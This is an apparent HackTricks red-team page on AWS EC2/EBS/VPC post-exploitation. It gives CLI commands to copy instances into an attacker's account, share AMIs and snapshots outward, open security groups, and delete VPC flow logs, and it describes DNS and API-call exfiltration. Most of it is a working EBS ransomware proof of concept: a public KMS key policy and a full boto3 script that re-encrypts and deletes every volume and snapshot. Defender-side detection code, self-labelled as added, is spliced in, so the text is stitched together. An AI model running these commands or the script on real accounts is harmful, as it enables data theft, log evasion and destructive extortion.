AWS - EC2, EBS, SSM & VPC Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

EC2 & VPC

For more information check:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

Malicious VPC Mirror - ec2:DescribeInstances, ec2:RunInstances, ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress, ec2:CreateTrafficMirrorTarget, ec2:CreateTrafficMirrorSession, ec2:CreateTrafficMirrorFilter, ec2:CreateTrafficMirrorFilterRule

VPC traffic mirroring duplicates inbound and outbound traffic for EC2 instances inside a VPC without needing to install anything on the instances themselves. This duplicated traffic would normally be sent to something like a network intrusion detection system (IDS) for analysis and monitoring. An attacker could abuse this to capture all of the traffic and obtain sensitive information from it:

For more information check this page:

AWS - Malicious VPC Mirror

Copy Running Instance

Instances usually contain some kind of sensitive information. There are different ways to get inside (check the EC2 privilege escalation techniques). However, another way to check what an instance contains is to create an AMI from it and run a new instance (even in your own account):

# List instances
aws ec2 describe-instances

# create a new image for the instance-id
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# add key to AWS
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# now you can check the instance
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# If needed : edit groups
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01"  --region eu-west-1

# be a good guy, clean our instance to avoid any useless cost
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1

EBS Snapshot Dump

EBS snapshots are backups of volumes, which will usually contain sensitive information, so checking them could reveal that information. If you find a volume without a snapshot you could: create a snapshot and perform the following actions, or just mount it on an instance inside the account:

AWS - EBS Snapshot Dump

Data Exfiltration

DNS Exfiltration

Even if you lock down an EC2 instance so that no traffic can get out, it can still exfiltrate data via DNS.

  • VPC Flow Logs will not record this.

  • You don't have access to AWS DNS logs.

  • Disable this by setting "enableDnsSupport" to false with:

aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>

Exfiltration through API calls

An attacker could call API endpoints of an account controlled by them. CloudTrail will log these calls and the attacker will be able to see the exfiltrated data in the CloudTrail logs.

Open Security Group

You can get further access to network services by opening ports like this:

aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
# Or you could just open it to more specific IPs, or maybe the internal network if you have already compromised an EC2 in the VPC

Privesc to ECS

It's possible to run an EC2 instance and register it to be used to run ECS instances, and then steal the data of those ECS instances.

For more information check this.

Remove VPC flow logs

aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>

Share AMI

aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

Share EBS Snapshot

aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

EBS Ransomware PoC

A proof of concept similar to the Ransomware demonstration shown in the S3 post-exploitation notes. KMS should be renamed RMS, the Ransomware Management Service, for how easy it is to use it to encrypt various AWS services.

First, from the 'attacker' AWS account, create a customer managed key in KMS. For this example we'll have AWS manage the key material for us, but in a real scenario a malicious actor would keep the key material outside of AWS's control. Change the key policy to allow any AWS principal to use the key. For this key policy, the account name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption'.

{
  "Version": "2012-10-17",
  "Id": "key-consolepolicy-3",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    },
    {
      "Sid": "Allow access for Key Administrators",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:Create*",
        "kms:Describe*",
        "kms:Enable*",
        "kms:List*",
        "kms:Put*",
        "kms:Update*",
        "kms:Revoke*",
        "kms:Disable*",
        "kms:Get*",
        "kms:Delete*",
        "kms:TagResource",
        "kms:UntagResource",
        "kms:ScheduleKeyDeletion",
        "kms:CancelKeyDeletion"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Allow use of the key",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:Encrypt",
        "kms:Decrypt",
        "kms:ReEncrypt*",
        "kms:GenerateDataKey*",
        "kms:DescribeKey"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Outside Encryption",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": [
        "kms:Encrypt",
        "kms:Decrypt",
        "kms:ReEncrypt*",
        "kms:GenerateDataKey*",
        "kms:DescribeKey",
        "kms:GenerateDataKeyWithoutPlainText",
        "kms:CreateGrant"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Allow attachment of persistent resources",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:CreateGrant",
        "kms:ListGrants",
        "kms:RevokeGrant"
      ],
      "Resource": "*",
      "Condition": {
        "Bool": {
          "kms:GrantIsForAWSResource": "true"
        }
      }
    }
  ]
}

The key policy rule needs the following actions enabled to allow the key to be used to encrypt an EBS volume:

  • kms:CreateGrant

  • kms:Decrypt

  • kms:DescribeKey

  • kms:GenerateDataKeyWithoutPlainText

  • kms:ReEncrypt
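As an added defender-side example (not from the page or the original PoC), the following Python audits a KMS key policy for exactly the pattern described above: an unconditional Allow statement for any principal that grants every action in the list. It assumes policy documents in the JSON form shown on this page; the sample policy, account id and statement contents are constructed.

```python
EBS_ENCRYPT_ACTIONS = {
    "kms:CreateGrant", "kms:Decrypt", "kms:DescribeKey",
    "kms:GenerateDataKeyWithoutPlainText", "kms:ReEncrypt",
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _action_matches(pattern, action):
    # IAM action names are case-insensitive; a trailing '*' is a prefix wildcard.
    pattern, action = pattern.lower(), action.lower()
    if pattern.endswith("*"):
        return action.startswith(pattern[:-1])
    return pattern == action

def _principal_is_public(principal):
    # Principal may be "*" or {"AWS": "*"} / {"AWS": ["*", ...]}.
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))

def public_allow_statements(policy):
    # Unconditional Allow statements that any AWS principal can use.
    return [s for s in policy.get("Statement", [])
            if s.get("Effect") == "Allow" and "Condition" not in s
            and _principal_is_public(s.get("Principal"))]

def public_ebs_encrypt_actions(policy):
    # Which of the required actions does the world get from this key policy?
    granted = set()
    for stmt in public_allow_statements(policy):
        for pattern in _as_list(stmt.get("Action", [])):
            granted |= {a for a in EBS_ENCRYPT_ACTIONS if _action_matches(pattern, a)}
    return granted  # equal to EBS_ENCRYPT_ACTIONS means anyone can use the key for EBS

def without_statement(policy, sid):
    # The second step the page describes: drop the public statement again.
    return {**policy, "Statement": [s for s in policy["Statement"] if s.get("Sid") != sid]}

# Constructed sample, reduced from the page's policy (account id is a placeholder).
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "Allow use of the key", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111111111111:user/AttackSim"},
     "Action": ["kms:Encrypt", "kms:Decrypt"], "Resource": "*"},
    {"Sid": "Outside Encryption", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["kms:Encrypt", "kms:Decrypt", "kms:ReEncrypt*", "kms:GenerateDataKey*",
                "kms:DescribeKey", "kms:GenerateDataKeyWithoutPlainText", "kms:CreateGrant"],
     "Resource": "*"}]}
```

The same check applied to your own keys (the policy from kms get-key-policy) flags any key that a foreign account could be using to encrypt your volumes.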

Now that the key is publicly accessible, we can use a 'victim' account that has some EC2 instances running with unencrypted EBS volumes attached. The 'victim' account's EBS volumes are the ones we're targeting for encryption; this attack operates under the assumption of a compromised high-privilege AWS account.

Similar to the S3 ransomware example, this attack will make copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and finally delete the snapshots used to create the newly encrypted EBS volumes.

This results in only encrypted EBS volumes being available in the account.

It's also worth noting that the script stopped the EC2 instances in order to detach and delete the original EBS volumes. The original unencrypted volumes are now gone.

Next, go back to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy.

{
  "Version": "2012-10-17",
  "Id": "key-consolepolicy-3",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    },
    {
      "Sid": "Allow access for Key Administrators",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:Create*",
        "kms:Describe*",
        "kms:Enable*",
        "kms:List*",
        "kms:Put*",
        "kms:Update*",
        "kms:Revoke*",
        "kms:Disable*",
        "kms:Get*",
        "kms:Delete*",
        "kms:TagResource",
        "kms:UntagResource",
        "kms:ScheduleKeyDeletion",
        "kms:CancelKeyDeletion"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Allow use of the key",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:Encrypt",
        "kms:Decrypt",
        "kms:ReEncrypt*",
        "kms:GenerateDataKey*",
        "kms:DescribeKey"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Allow attachment of persistent resources",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:CreateGrant",
        "kms:ListGrants",
        "kms:RevokeGrant"
      ],
      "Resource": "*",
      "Condition": {
        "Bool": {
          "kms:GrantIsForAWSResource": "true"
        }
      }
    }
  ]
}

Wait a moment for the new key policy to propagate. Then go back to the 'victim' account and try to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume.


But when you try to start the EC2 instance with the encrypted EBS volume attached, it will simply fail and go from the 'pending' state back to the 'stopped' state forever, because the attached EBS volume can't be decrypted with the key now that the key policy no longer allows it.


Here's the python script used. It takes AWS creds for the 'victim' account and the publicly available AWS ARN of the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots used during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL OF THE ORIGINAL EBS VOLUMES. You could recover them using the KMS key that was used and restore them to their original state via snapshots, but I just want to make you aware that this is a ransomware PoC at the end of the day.

import boto3
import argparse
from botocore.exceptions import ClientError

def enumerate_ec2_instances(ec2_client):
    # Map every instance id to the EBS volume ids attached to it
    instances = ec2_client.describe_instances()
    instance_volumes = {}
    for reservation in instances['Reservations']:
        for instance in reservation['Instances']:
            instance_id = instance['InstanceId']
            volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
            instance_volumes[instance_id] = volumes
    return instance_volumes

def snapshot_volumes(ec2_client, volumes):
    # Snapshot each volume; the snapshots are the source for the re-encrypted copies
    snapshot_ids = []
    for volume_id in volumes:
        snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
        snapshot_ids.append(snapshot['SnapshotId'])
    return snapshot_ids

def wait_for_snapshots(ec2_client, snapshot_ids):
    for snapshot_id in snapshot_ids:
        ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])

def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
    # Create a new volume from each snapshot in the original volume's AZ, encrypted with the attacker's key
    new_volume_ids = []
    for snapshot_id in snapshot_ids:
        snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
        volume_id = snapshot_info['VolumeId']
        volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
        availability_zone = volume_info['AvailabilityZone']

        volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
                                          Encrypted=True, KmsKeyId=kms_key_arn)
        new_volume_ids.append(volume['VolumeId'])
    return new_volume_ids

def stop_instances(ec2_client, instance_ids):
    # Instances must be stopped before their root volumes can be detached
    for instance_id in instance_ids:
        try:
            instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
            instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']

            if instance_state == 'running':
                ec2_client.stop_instances(InstanceIds=[instance_id])
                print(f"Stopping instance: {instance_id}")
                ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
                print(f"Instance {instance_id} stopped.")
            else:
                print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")

        except ClientError as e:
            print(f"Error stopping instance {instance_id}: {e}")

def detach_and_delete_volumes(ec2_client, volumes):
    for volume_id in volumes:
        try:
            ec2_client.detach_volume(VolumeId=volume_id)
            ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
            ec2_client.delete_volume(VolumeId=volume_id)
            print(f"Deleted volume: {volume_id}")
        except ClientError as e:
            print(f"Error detaching or deleting volume {volume_id}: {e}")


def delete_snapshots(ec2_client, snapshot_ids):
    # Remove the intermediate snapshots so no unencrypted copy is left behind
    for snapshot_id in snapshot_ids:
        try:
            ec2_client.delete_snapshot(SnapshotId=snapshot_id)
            print(f"Deleted snapshot: {snapshot_id}")
        except ClientError as e:
            print(f"Error deleting snapshot {snapshot_id}: {e}")

def replace_volumes(ec2_client, instance_volumes):
    instance_ids = list(instance_volumes.keys())
    stop_instances(ec2_client, instance_ids)

    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
    detach_and_delete_volumes(ec2_client, all_volumes)

def ebs_lock(access_key, secret_key, region, kms_key_arn):
    # Library-style entry point; main() below does the same from CLI arguments
    ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)

    instance_volumes = enumerate_ec2_instances(ec2_client)
    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
    wait_for_snapshots(ec2_client, snapshot_ids)
    create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
    replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
    delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed

def parse_arguments():
    parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
    parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
    parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
    parser.add_argument('--region', required=True, help='AWS Region')
    parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
    return parser.parse_args()

def main():
    args = parse_arguments()
    ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)

    instance_volumes = enumerate_ec2_instances(ec2_client)
    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
    wait_for_snapshots(ec2_client, snapshot_ids)
    create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
    replace_volumes(ec2_client, instance_volumes)
    delete_snapshots(ec2_client, snapshot_ids)

if __name__ == "__main__":
    main()
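As an added defender-side example that is not part of the page or the PoC script, the following Python looks for what this attack and the AMI/snapshot sharing sections above leave behind: EBS volumes encrypted under a KMS key owned by a different account, and snapshots or AMIs whose permissions grant other accounts (or everyone) access. It works on the response shapes of describe_volumes, describe_snapshot_attribute and describe_image_attribute; the sample volumes, ids and account numbers are constructed.

```python
import re

KMS_KEY_ARN = re.compile(r"^arn:aws:kms:[a-z0-9-]+:(\d{12}):key/")

def kms_key_account(kms_key_id):
    # Owning account id from a KMS key ARN; None for bare key ids or aliases.
    m = KMS_KEY_ARN.match(kms_key_id or "")
    return m.group(1) if m else None

def foreign_key_volumes(describe_volumes_response, own_account_id):
    # Volumes encrypted with a key another account controls: if that account
    # later locks its key policy, these volumes can be attached but never read.
    hits = []
    for vol in describe_volumes_response.get("Volumes", []):
        owner = kms_key_account(vol.get("KmsKeyId")) if vol.get("Encrypted") else None
        if owner and owner != own_account_id:
            hits.append((vol["VolumeId"], owner))
    return hits

def external_grants(permissions, own_account_id):
    # Works on CreateVolumePermissions (snapshots) and LaunchPermissions (AMIs):
    # both list {"UserId": ...} entries, or {"Group": "all"} for public sharing.
    out = []
    for perm in permissions:
        if perm.get("Group") == "all":
            out.append("all")
        elif perm.get("UserId") and perm["UserId"] != own_account_id:
            out.append(perm["UserId"])
    return out

def audit_live(region, own_account_id):
    # Live variant (needs boto3 and credentials; the offline sample below does not).
    import boto3
    ec2 = boto3.client("ec2", region_name=region)
    findings = {"foreign_key_volumes": foreign_key_volumes(ec2.describe_volumes(), own_account_id)}
    for snap in ec2.describe_snapshots(OwnerIds=["self"])["Snapshots"]:
        perms = ec2.describe_snapshot_attribute(
            SnapshotId=snap["SnapshotId"], Attribute="createVolumePermission")
        shared = external_grants(perms["CreateVolumePermissions"], own_account_id)
        if shared:
            findings.setdefault("shared_snapshots", {})[snap["SnapshotId"]] = shared
    return findings

# Constructed describe_volumes-style sample; ids and account numbers are made up.
SAMPLE_VOLUMES = {"Volumes": [
    {"VolumeId": "vol-0aaa", "Encrypted": False, "State": "in-use"},
    {"VolumeId": "vol-0bbb", "Encrypted": True, "State": "available",
     "KmsKeyId": "arn:aws:kms:eu-west-1:111111111111:key/11111111-2222-3333-4444-555555555555"},
    {"VolumeId": "vol-0ccc", "Encrypted": True, "State": "available",
     "KmsKeyId": "arn:aws:kms:eu-west-1:999999999999:key/aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"}]}
```

A volume in the first list that also shows up as recently created while the instance's previous volumes were deleted is the exact footprint of the script above.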